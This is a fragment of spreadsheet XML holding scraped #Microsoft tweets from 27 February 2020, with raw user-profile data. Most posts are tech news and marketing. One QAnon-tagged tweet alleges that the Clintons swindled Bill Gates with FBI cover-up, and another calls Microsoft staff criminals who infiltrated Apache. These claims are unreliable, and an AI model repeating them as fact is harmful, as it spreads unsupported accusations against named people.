    <t>#microsoft     Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing. Check out this infographic to see how you can benefit from Teamworksolutions from Microsoft. https://t.co/tIxtXZjfh0</t>
  </si>
  <si>
    <t>Thu Feb 27 19:31:17 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/iYj6qDBcOJ</t>
  </si>
  <si>
    <t>Thu Feb 27 19:30:04 +0000 2020</t>
  </si>
  <si>
    <t>GDC moving forward as planned as Epic, Microsoft, and others pull out over coronavirus concerns https://t.co/RGDX2yjh3T via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:28:19 +0000 2020</t>
  </si>
  <si>
    <t>Minecraft Festival is coming to Orlando in September https://t.co/QxxINm0hjv #Microsoft</t>
  </si>
  <si>
    <t>Microsoft won't be at GDC because of coronavirus https://t.co/45uYcBOpOg #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:27:15 +0000 2020</t>
  </si>
  <si>
    <t>Brave beats other browsers in privacy study  Naked Security
#Safari #Firefox #Brave #Browser #Privacy #CyberSecurity #Microsoft #InfoSec  https://t.co/DwGFtltz9d</t>
  </si>
  <si>
    <t>{'id': 3873643179, 'id_str': '3873643179', 'name': 'it-soft GmbH', 'screen_name': 'itsoftgmbh', 'location': 'MÃ¼nchen, Bayern', 'description': 'IT system house with own #datacenter over 20 years. We specialise in #itsecurity #software-development #itconsulting #hosting #housing #domain #outsourcing', 'url': 'https://t.co/FIlBgXcus5', 'entities': {'url': {'urls': [{'url': 'https://t.co/FIlBgXcus5', 'expanded_url': 'http://www.it-soft.com', 'display_url': 'it-soft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 527, 'friends_count': 525, 'listed_count': 89, 'created_at': 'Mon Oct 05 19:14:38 +0000 2015', 'favourites_count': 235, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5027,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'http://pbs.twimg.com/profile_images/651387616030429185/vMV1DwiG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/651387616030429185/vMV1DwiG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3873643179/1444137343',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'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 19:25:45 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft update
Historical top is in https://t.co/hDbOMfLgCx</t>
  </si>
  <si>
    <t>{'id': 1024286514065403904, 'id_str': '1024286514065403904', 'name': 'Fractalgymnastics', 'screen_name': 'FractalKaleido1', 'location': 'Tierra del Fuego Antarctic and', 'description': 'Smarter people rig the tables against gamblers.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 331, 'listed_count': 2, 'created_at': 'Tue Jul 31 13:31:50 +0000 2018', 'favourites_count': 854, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1874,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'http://pbs.twimg.com/profile_images/1234075144538251266/NXQUNMuO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234075144538251266/NXQUNMuO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1024286514065403904/1575927297', 'profile_link_color': '111111',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</si>
  <si>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19:25:19 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Minecraft Festival is coming to Orlando in September https://t.co/s9zMflE4O5</t>
  </si>
  <si>
    <t>Thu Feb 27 19:25:18 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Microsoft won't be at GDC because of coronavirus https://t.co/TD6fr9Qo6z</t>
  </si>
  <si>
    <t>Thu Feb 27 19:20:15 +0000 2020</t>
  </si>
  <si>
    <t>LiveTiles is now the largest global digital workplace provider and the only one addressing the needs of organizations of all sizes and work styles. Join our 3/2 webinar to learn more: https://t.co/GfYrY6CTTl
#DigitalWorkplace
#LiveTiles
#Hyperfish
#Wizdom
#CYCL
#AI
#Microsoft https://t.co/qbbeD2Uc12</t>
  </si>
  <si>
    <t>Thu Feb 27 19:19:30 +0000 2020</t>
  </si>
  <si>
    <t>Learn how endpoint management changed for IT post-Windows 10 and the critical gaps left by other #Microsoft solutions (#SCCM, #Autopilot, #Intune). Register for the live #webcast today - https://t.co/Ww6eMk7yu6 https://t.co/4YUwhevYVL</t>
  </si>
  <si>
    <t>Thu Feb 27 19:17:12 +0000 2020</t>
  </si>
  <si>
    <t>The Xbox Series X Will Have The Ability To Resume Games After Reboot https://t.co/k4NHpr1K3e #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:16:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Unity pull out of GDC 2020 over coronavirus concerns #Microsoft #GDC #Unity https://t.co/4aY4MaWKrO https://t.co/OjmEiyQOuF</t>
  </si>
  <si>
    <t>Thu Feb 27 19:13:43 +0000 2020</t>
  </si>
  <si>
    <t>XR, MR, VR, AR.... So many realities. Looking forward to hearing from #Microsoft @dotnetliverpool @leadagencyliverpool.</t>
  </si>
  <si>
    <t>{'id': 1032006685357998080, 'id_str': '1032006685357998080', 'name': 'SceneGraph Studios', 'screen_name': 'SgSLiv', 'location': 'Liverpool, England', 'description': '4D Presentations, VR/AR/MR to re-imagine, visualise, and animate our clientâ€™s complex procedures and pipelines through interactive and playful designs.', 'url': 'https://t.co/43N9PAefTR', 'entities': {'url': {'urls': [{'url': 'https://t.co/43N9PAefTR', 'expanded_url': 'http://www.scenegraphstudios.com', 'display_url': 'scenegraphstudios.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 51, 'listed_count': 0, 'created_at': 'Tue Aug 21 20:49:02 +0000 2018', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1032007700362788864/EwvbtfPB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032007700362788864/EwvbtfPB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1032006685357998080/1549447036',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</si>
  <si>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19:12:56 +0000 2020</t>
  </si>
  <si>
    <t>Nice win for Slack.  Based on what I am seeing, #Slack (along with #Zoom) are definitely starting to grab market share from Microsoft.  #Microsoft is also ramping up efforts to drive adoption but also actual use of Teams to keep them out.   https://t.co/Y9FFgtiKud</t>
  </si>
  <si>
    <t>Thu Feb 27 19:11:59 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Tip of the day:
#Microsoft #Azure Azure Firewall Manager now supports virtual networks https://t.co/zwICOTKxJM</t>
  </si>
  <si>
    <t>Thu Feb 27 19:11:15 +0000 2020</t>
  </si>
  <si>
    <t>@mihn @ElaMoscicka Yes indeed, a good city and a good location #Microsoft #Prague office.  https://t.co/TbVGHRpy5m</t>
  </si>
  <si>
    <t>{'id': 458242571, 'id_str': '458242571', 'name': 'Ali Hasan âŽðŸŽ®', 'screen_name': 'alihasan_dev', 'location': '', 'description': '#SoftwareDeveloper, #Blogger, #Gamer and JackOfAllTrades. Loves Archery. Passionate about C#, #Python, #NeuralNetworks, #ML, #AI, #Azure, #DotNet', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 326, 'friends_count': 1500, 'listed_count': 26, 'created_at': 'Sun Jan 08 10:19:44 +0000 2012', 'favourites_count': 650, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 849, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/452873025847697408/BqrU6Slh_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/452873025847697408/BqrU6Slh_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/458242571/1582766240', 'profile_link_color': '13BD7C',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</si>
  <si>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Feb 27 19:10:01 +0000 2020</t>
  </si>
  <si>
    <t>Is your business still clinging to Windows 7? Here's what to do after Microsoft's support of Windows 7 ended on January 14, 2020. https://t.co/kUU2a1iUmV @ZDNet #Microsoft #windows</t>
  </si>
  <si>
    <t>Thu Feb 27 19:09:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft XBOX 360 Wireless Adapter Repair 
https://t.co/vBtkgyYX6a via @YouTube
#microsoft #xbox360</t>
  </si>
  <si>
    <t>{'id': 950351838641041408, 'id_str': '950351838641041408', 'name': 'GadgetUK164', 'screen_name': 'GadgetUK164', 'location': 'England, United Kingdom', 'description': 'Retro Gaming Repairs &amp; Mods - My YouTube channel https://t.co/roG81gorTl Patreon https://t.co/QwfuP7Dn50', 'url': 'https://t.co/qjg6AdSTmW', 'entities': {'url': {'urls': [{'url': 'https://t.co/qjg6AdSTmW', 'expanded_url': 'https://www.youtube.com/GadgetUK164', 'display_url': 'youtube.com/GadgetUK164', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/roG81gorTl', 'expanded_url': 'http://youtube.com/GadgetUK164', 'display_url': 'youtube.com/GadgetUK164', 'indices': [49, 72]}, {'url': 'https://t.co/QwfuP7Dn50', 'expanded_url': 'http://patreon.com/GadgetUK164', 'display_url': 'patreon.com/GadgetUK164', 'indices': [81, 104]}]}}, 'protected': False, 'followers_count': 1766, 'friends_count': 493, 'listed_count': 17, 'created_at': 'Mon Jan 08 13:01:49 +0000 2018', 'favourites_count': 13703, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3525,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'http://pbs.twimg.com/profile_images/950352575181852672/2wa6b9gS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/950352575181852672/2wa6b9gS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/950351838641041408/1515416707',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</si>
  <si>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19:08:47 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 19:08:09 +0000 2020</t>
  </si>
  <si>
    <t>Threat actors scan Internet for Vulnerable #Microsoft #Exchange Servers
https://t.co/FufuUtdWDs
#securityaffairs #hacking #malware</t>
  </si>
  <si>
    <t>Thu Feb 27 19:08:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft withdraws from GDC gaming conference over coronavirus concerns https://t.co/DayH7mUtyV #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:08:04 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/EppKKH3uoH</t>
  </si>
  <si>
    <t>Thu Feb 27 19:07:43 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/8MMCCldT4P</t>
  </si>
  <si>
    <t>Thu Feb 27 19:06:51 +0000 2020</t>
  </si>
  <si>
    <t>The first part of this series on Storage Spaces Direct addresses the fundament question - what is it and why is it useful? S2D was originally included in Windows Server 2016 but has experienced a huge surge in adoption lately. Find ou... #Microsoft #HyperV https://t.co/u4IsKfwTuY</t>
  </si>
  <si>
    <t>Thu Feb 27 19:05:15 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery data encryption feature will be retired April 30, 2022 https://t.co/gRS8Lwo74o #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 19:05:14 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN LockDown mode explained. #Windows10 #Win10 #Microsoft #mobility #aovpn https://t.co/hRpJyWAHdQ</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023 https://t.co/hg4fdB8M0Q #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 19:05:13 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/j0ssOrnpSQ #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 19:04:45 +0000 2020</t>
  </si>
  <si>
    <t>The Apache Software Foundation Announces 20th Anniversary of #Apache #Subversion
 https://t.co/3QL7UEEKwA What a shame that criminals of #microsoft infiltrated #asf to destroy it https://t.co/Ik6LS7WRmV</t>
  </si>
  <si>
    <t>Thu Feb 27 19:02:55 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone
- https://t.co/A2jvzSlb4H
#Azure #Microsoft #Cloud #Networking #ExpressRoute https://t.co/LgMQED36mT</t>
  </si>
  <si>
    <t>Thu Feb 27 19:02:27 +0000 2020</t>
  </si>
  <si>
    <t>Want to improve #manufacturing efficiency? The Manufacturing Trends Report by #Microsoft explores six emerging trends that will help empower manufacturers to design more intelligent and efficient operations.
Read here: https://t.co/m5Z4tKuy4F
#AXSource #Dynamics365</t>
  </si>
  <si>
    <t>Thu Feb 27 19:02:12 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact FlexManage to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/7NH4d4QHnV</t>
  </si>
  <si>
    <t>{'id': 723181985796001794, 'id_str': '723181985796001794', 'name': 'FlexManage', 'screen_name': 'FlexManage', 'location': '120 S. LaSalle, Chicago, IL', 'description': 'Flexible technology solutions that enable business transformation. IT Consulting, Cloud, &amp; Managed Services - @Microsoft Partner #FlexFolks', 'url': 'https://t.co/Bpfgo529S1', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bpfgo529S1', 'expanded_url': 'http://www.flexmanage.com', 'display_url': 'flexmanage.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 285, 'friends_count': 578, 'listed_count': 45, 'created_at': 'Thu Apr 21 16:09:56 +0000 2016', 'favourites_count': 487, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1587,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'http://pbs.twimg.com/profile_images/767511437338152960/dmO70I-M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/767511437338152960/dmO70I-M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/723181985796001794/1471823900',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</si>
  <si>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19:02:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Fundamental PL-900 #Beta #Exam #Results now out - so glad to have passed it, and be taking my career to the next level! :D
#poweraddicts #community https://t.co/8W8bCSUpAw</t>
  </si>
  <si>
    <t>Thu Feb 27 19:01:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft just added a new #PowerBI tab for #MicrosoftTeams with support for reports in the new workspace experiences, Power BI apps, and paginated reports. 
Learn more: https://t.co/LoOYkCZshb
#Microsoft #MicrosoftPartner #MicrosoftUpdates https://t.co/szdkQBr8ul</t>
  </si>
  <si>
    <t>Thu Feb 27 19:01:16 +0000 2020</t>
  </si>
  <si>
    <t>@AzSiteRecovery data encryption feature will be #retired April 30, 2022
- To be replaced by the more advanced Encryption at Rest with Azure Site Recovery, which uses Storage Service Encryption (SSE)
https://t.co/TovsWXi4qu
#Azure #Microsoft #Cloud #DisasterRecovery #BCDR https://t.co/qn5CftCO7L</t>
  </si>
  <si>
    <t>Thu Feb 27 19:01:12 +0000 2020</t>
  </si>
  <si>
    <t>What makes #Microsoft a leader in the area of Sales Force Automation? See how Microsoft stacks up against competitors in this in-depth comparison by Forrester. https://t.co/mT7B5WjJEx https://t.co/RmjdBMNszI</t>
  </si>
  <si>
    <t>Thu Feb 27 19:00:27 +0000 2020</t>
  </si>
  <si>
    <t>Are you still running Windows 7? Did you know that Microsoft no longer supports this product? That's OK though, we'll tell you what you should be doing going forward.
https://t.co/SUBLQjZIhj
#Microsoft #Windows7 #Support</t>
  </si>
  <si>
    <t>Thu Feb 27 19:00:00 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft pledges to be 100% carbon-negative' by 2025! 
That means they will remove more carbon from the atmosphere than they generate, &amp;amp; #Microsoft plans to do that in a number of ways like reforestation, soil carbon sequestration, &amp;amp; new carbon capture technologies. https://t.co/jLSangZmNg</t>
  </si>
  <si>
    <t>{'id': 1214253686370623489, 'id_str': '1214253686370623489', 'name': 'Ever Green Cloth', 'screen_name': 'evergreencloth_', 'location': 'Rancho Santa Fe, California', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Jan 06 18:35:08 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214254236747223040/CZi2bAoa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214254236747223040/CZi2bAoa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1214253686370623489/1578340789',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</si>
  <si>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18:59:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and feedback and store and server and service and connection and setting and windows and app's and outlook and mail app heavy and bad so much and down and broken right now</t>
  </si>
  <si>
    <t>Thu Feb 27 18:58:40 +0000 2020</t>
  </si>
  <si>
    <t>#NewSuperLuckysTale | First 23 Minutes of demo on Nintendo Switch - #FirstLook - #Gameplay
Link: https://t.co/l2pfyDN8WZ
#NintendoSwitchLite #SwitcheShop #SuperLuckysTale #NintendoSwitch #SwitchLite #Microsoft... https://t.co/ep4ff2fHcJ</t>
  </si>
  <si>
    <t>{'id': 2234350724, 'id_str': '2234350724', 'name': 'Nintendo Hall', 'screen_name': 'NintendoHall', 'location': 'Italia', 'description': 'News, Recensioni, video e articoli dal mondo Nintendo. https://t.co/JZAJPLhEvO\nSupport us: https://t.co/yONNlJTB18', 'url': 'https://t.co/BTuNpyPbQh', 'entities': {'url': {'urls': [{'url': 'https://t.co/BTuNpyPbQh', 'expanded_url': 'http://nintendohall.altervista.org/', 'display_url': 'nintendohall.altervista.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JZAJPLhEvO', 'expanded_url': 'https://www.youtube.com/channel/UCaHhTpk8i07XL7DAeZ0UmFQ?sub_confirmation=1', 'display_url': 'youtube.com/channel/UCaHhTâ€¦', 'indices': [55, 78]}, {'url': 'https://t.co/yONNlJTB18', 'expanded_url': 'https://youtube.streamlabs.com/UCaHhTpk8i07XL7DAeZ0UmFQ#/', 'display_url': 'youtube.streamlabs.com/UCaHhTpk8i07XLâ€¦', 'indices': [91, 114]}]}}, 'protected': False, 'followers_count': 2063, 'friends_count': 2002, 'listed_count': 317, 'created_at': 'Sat Dec 07 11:15:56 +0000 2013', 'favourites_count': 22782, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93473,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231158289142079488/uremUoFQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231158289142079488/uremUoFQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2234350724/1582365987',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</si>
  <si>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18:58:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Unity pulling out of GDC due to everyone's favorite virus. 
#coronavirus #Microsoft #Unity #GDC #GDC20</t>
  </si>
  <si>
    <t>{'id': 1188569661614575617, 'id_str': '1188569661614575617', 'name': 'Loot Saga', 'screen_name': 'LootSaga', 'location': 'lootsaga@gmail.com', 'description': 'Sharing amazing work being done in the world of indie video games! Visit our website, and send review requests to email.\n#IndieDevWorldOrder #IndieWorldOrder', 'url': 'https://t.co/PEf6bruyrW', 'entities': {'url': {'urls': [{'url': 'https://t.co/PEf6bruyrW', 'expanded_url': 'http://www.lootsaga.com', 'display_url': 'lootsaga.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 450, 'friends_count': 675, 'listed_count': 6, 'created_at': 'Sun Oct 27 21:34:45 +0000 2019', 'favourites_count': 889, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 670, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199908256761561088/NpwAt7zW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199908256761561088/NpwAt7zW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188569661614575617/1582503949',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</si>
  <si>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18:57:21 +0000 2020</t>
  </si>
  <si>
    <t>Let's discuss all of your I.T needs...
https://t.co/vxSxeCJiuP
#ritzhosts #ritz24 #ritz #it #tech #technology #digital #hosting #website #content #online #microsoft #google #uiux #design #testing #software #programming... https://t.co/87iOv5EajY</t>
  </si>
  <si>
    <t>{'id': 141151466, 'id_str': '141151466', 'name': 'Kint-Elle Afrique', 'screen_name': 'kutedamsel', 'location': 'Lekki, Lagos, Nigeria', 'description': 'Social Media Expert.\n\nSocial Worker.\n\nContent Editor.\n\nPsychologist.\n\nCopywriter.\n\nScreenplay Writer.\n\nMedia Hopper.\n\n#AQUARIUS, God in me... #Knowledgeispower', 'url': 'https://t.co/2NynWe5YRr', 'entities': {'url': {'urls': [{'url': 'https://t.co/2NynWe5YRr', 'expanded_url': 'http://www.kemmysocialworker.blogspot.com', 'display_url': 'kemmysocialworker.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 446, 'friends_count': 265, 'listed_count': 43, 'created_at': 'Fri May 07 09:13:53 +0000 2010', 'favourites_count': 272, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11669,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'http://pbs.twimg.com/profile_images/826015720031055873/2s2quQ5l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/826015720031055873/2s2quQ5l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/141151466/1459973085',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</si>
  <si>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Thu Feb 27 18:56:04 +0000 2020</t>
  </si>
  <si>
    <t>Here is the #VR version of the same game we demoed at  #Microsoft #Reactor #HoloLens2 , Indoor Bike. Check it out https://t.co/SLYBRRf8y8 via 
@YouTube
 #AR #MixedReality #lifestyle #gym in the #future https://t.co/Yx3XxJD3uf</t>
  </si>
  <si>
    <t>{'id': 1106300420995973120, 'id_str': '1106300420995973120', 'name': 'Khou', 'screen_name': 'khou_42', 'location': 'California, USA', 'description': "Tech maker, GDG organizer // If machine can do the work, why don't we do something creative. part_time #artist &amp; part_time #philosopher", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 28, 'listed_count': 1, 'created_at': 'Thu Mar 14 21:05:49 +0000 2019', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1106301344195833856/1ArPoQOG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1106301344195833856/1ArPoQOG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1106300420995973120/1552620458',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</si>
  <si>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18:55:07 +0000 2020</t>
  </si>
  <si>
    <t>Big Data Platform Market 2020 Global Industry Analysis by Key Players - 
#1010data 
#Cloudera
#IBM
#Microsoft
#Oracle
#PivotalSoftware
#SAP
#Sisense
#Teradata
#VerticaSystems
#BigData  https://t.co/PlEaOubY19</t>
  </si>
  <si>
    <t>Thu Feb 27 18:54:51 +0000 2020</t>
  </si>
  <si>
    <t>Big news for enterprises running legacy IBM POWER workloads. 
POWER to you Skytap this is awesome!
#IBMPower #AIX #Azure #AS400 #IBMi
#Microsoft https://t.co/yz581UOpxf</t>
  </si>
  <si>
    <t>{'id': 39383225, 'id_str': '39383225', 'name': 'Hamish Hill', 'screen_name': 'HamishHill', 'location': 'On a plane or in the mountains', 'description': '#Kiwi | Head of Marketing @Skytap | Storyteller | Pilot | Cyclist | \n*These are my own views &amp; snippets across tech &amp; travel adventures.', 'url': 'https://t.co/6G4DhZqg88', 'entities': {'url': {'urls': [{'url': 'https://t.co/6G4DhZqg88', 'expanded_url': 'https://goo.gl/KqKDMi', 'display_url': 'goo.gl/KqKDMi', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 679, 'friends_count': 1058, 'listed_count': 47, 'created_at': 'Tue May 12 00:14:06 +0000 2009', 'favourites_count': 422, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5893,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'http://pbs.twimg.com/profile_images/1051854982646038528/CSlxtiG5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051854982646038528/CSlxtiG5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39383225/1539616834',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</si>
  <si>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18:54:14 +0000 2020</t>
  </si>
  <si>
    <t>Check out the announcement @ERPfocus re: the ESS (Enterprise Software Showcase) hosted by @TECtweets &amp;amp; organized by @Godlan_Inc.  https://t.co/21wOs40xyc For more info &amp;amp; to register:  https://t.co/ZNoL9mRnIU #ERP #MFG #Infor #Oracle #Microsoft #Sage #IFS #erpdemo #softwaredemo https://t.co/YFYd3Xfucr</t>
  </si>
  <si>
    <t>{'id': 418169524, 'id_str': '418169524', 'name': 'Godlan, Inc.', 'screen_name': 'Godlan_Inc', 'location': 'Clinton Township, MI', 'description': 'Since 1984, Godlan has worked with Discrete Manufacturers of all sizes, successfully implementing hundreds of enterprise manufacturing systems. #ERP #EnSw', 'url': 'http://t.co/55YElAYYyx', 'entities': {'url': {'urls': [{'url': 'http://t.co/55YElAYYyx', 'expanded_url': 'http://www.godlan.com', 'display_url': 'godlan.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 321, 'friends_count': 313, 'listed_count': 20, 'created_at': 'Mon Nov 21 21:04:33 +0000 2011', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 557, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDEFF2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1720366074/godlan_O_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1720366074/godlan_O_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/418169524/1398363286',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</si>
  <si>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Feb 27 18:54:05 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/lZeU9GkdIK</t>
  </si>
  <si>
    <t>Thu Feb 27 18:53:30 +0000 2020</t>
  </si>
  <si>
    <t>#DOJ Blocks #FBI Investigation of #Clintons SWINDLE of #BILLGATES Charity Cash; Fuming #Microsoft Mogul Duped Out of Untold Millions by #hillaryClinton #billclinton #clintonfoundation 
#qanon  1. When FBI agents working the Clinton Foundation investigation developed intelligence</t>
  </si>
  <si>
    <t>{'id': 1219986276495110151, 'id_str': '1219986276495110151', 'name': 'PhennommANON', 'screen_name': 'PhennommA', 'location': 'stargate', 'description': 'ADMIN GLP 1st in news! FL Journalist 15yrs, Frmr Radio/podcast host, paralegal 38yrs, advocate 4disabled elderly/vets/kids. Anti-democrat. \n#Maga2020 #TRUMP2020', 'url': 'https://t.co/VcMYPz1PmQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/VcMYPz1PmQ', 'expanded_url': 'http://www.godlikeproductions.com', 'display_url': 'godlikeproductions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2961, 'friends_count': 2880, 'listed_count': 1, 'created_at': 'Wed Jan 22 14:13:08 +0000 2020', 'favourites_count': 3900, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4924, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219988892247609346/ZtVUVqGg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219988892247609346/ZtVUVqGg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1219986276495110151/1579703591',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</si>
  <si>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18:52:28 +0000 2020</t>
  </si>
  <si>
